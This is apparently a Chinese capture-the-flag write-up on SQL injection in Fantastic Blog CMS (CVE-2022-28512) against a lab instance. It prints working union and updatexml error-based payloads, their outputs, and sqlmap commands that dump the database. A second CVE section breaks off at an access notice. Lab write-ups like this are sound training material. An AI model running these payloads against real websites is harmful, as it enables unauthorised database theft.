(CVE-2022-28512)(CVE-2021-26231)
Fantastic Blog (CMS) SQL注入(CVE-2022-28512)
Fantastic Blog (CMS)是一个绝对出色的博客/文章网络内容管理系统。它使您可以轻松地管理您的网站或博客,它为您提供了广泛的功能来定制您的博客以满足您的需求。它具有强大的功能,您无需接触任何代码即可启动并运行您的博客。 该CMS的/single.php路径下,id参数存在一个SQL注入漏洞。


?id=2' or 1=1 order by 9--%20
http://eci-2ze9nch9yrgm8gwlzeir.cloudeci1.ichunqiu.com/single.php?id=2' or 1=1 order by 9--%20
http://eci-2ze9nch9yrgm8gwlzeir.cloudeci1.ichunqiu.com/single.php?id=2' or 1=1 union select 1,2,3,4,5,6,7,8,9 --%20
但是没有回显
#查看数据库版本
http://eci-2ze9nch9yrgm8gwlzeir.cloudeci1.ichunqiu.com/single.php?id=1'+and+(updatexml(1,concat('~',version()),1))='
#查看数据库名
http://eci-2ze9nch9yrgm8gwlzeir.cloudeci1.ichunqiu.com/single.php?id=1'+and+(updatexml(1,concat('~',database()),1))='
返回 XPATH syntax error: '~ctf'
#查看表名
http://eci-2ze9nch9yrgm8gwlzeir.cloudeci1.ichunqiu.com/single.php?id=1'+and+(updatexml(1,concat('~',(select
group_concat(table_name) from information_schema.TABLES where TABLE_SCHEMA=database())),1))='
返回 XPATH syntax error: '~titles,page_hits,membership_...' 后面被省略了。。。。。
http://eci-2ze7cxg52hg1pf3n7vot.cloudeci1.ichunqiu.com/single.php?id=1'+and+(updatexml(1,concat('~',substr((select
group_concat(table_name) from information_schema.TABLES where TABLE_SCHEMA=database()),120,30)),1))='
返回 XPATH syntax error: '~ditors_choice,blogs,links,flag'
#查看字段名
http://eci-2ze7cxg52hg1pf3n7vot.cloudeci1.ichunqiu.com/single.php?id=1'+and+(updatexml(1,concat('~',substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),1,30)),1))='
返回 XPATH syntax error: '~flag'
#读取flag
http://eci-2ze7cxg52hg1pf3n7vot.cloudeci1.ichunqiu.com/single.php?id=1'+and+(updatexml(1,concat('~',substr((select flag from flag),1,30)),1))='
XPATH syntax error: '~flag{2c3c72f6-f66d-4af2-b3e3-5'
http://eci-2ze7cxg52hg1pf3n7vot.cloudeci1.ichunqiu.com/single.php?id=1'+and+(updatexml(1,concat('~',substr((select flag from flag),22,30)),1))='
XPATH syntax error: '~f2-b3e3-5e556fcd041c}'
flag{2c3c72f6-f66d-4af2-b3e3-5e556fcd041c}
sqlmap工具:sqlmap -u “http://eci-2zeaf80rb0vpkwgaw9s7.cloudeci1.ichunqiu.com//single.php?id=1” –dbs


另外一句话出来所有:sqlmap -u “http://eci-2zeaf80rb0vpkwgaw9s7.cloudeci1.ichunqiu.com//single.php?id=1” –batch –dump



Fantastic Blog (CMS) SQL注入(CVE-2021-26231)
漏洞介绍:Fantastic Blog (CMS)是一个绝对出色的博客/文章网络内容管理系统。它使您可以轻松地管理您的网站或博客,它为您提供了广泛的功能来定制您的博客以满足您的需求。它具有强大的功能,您无需接触任何代码即可启动并运行您的博客。 该CMS的/category.php文件中,id参数存在一个SQL注入漏洞。

您没有 权限 查看此处内容!
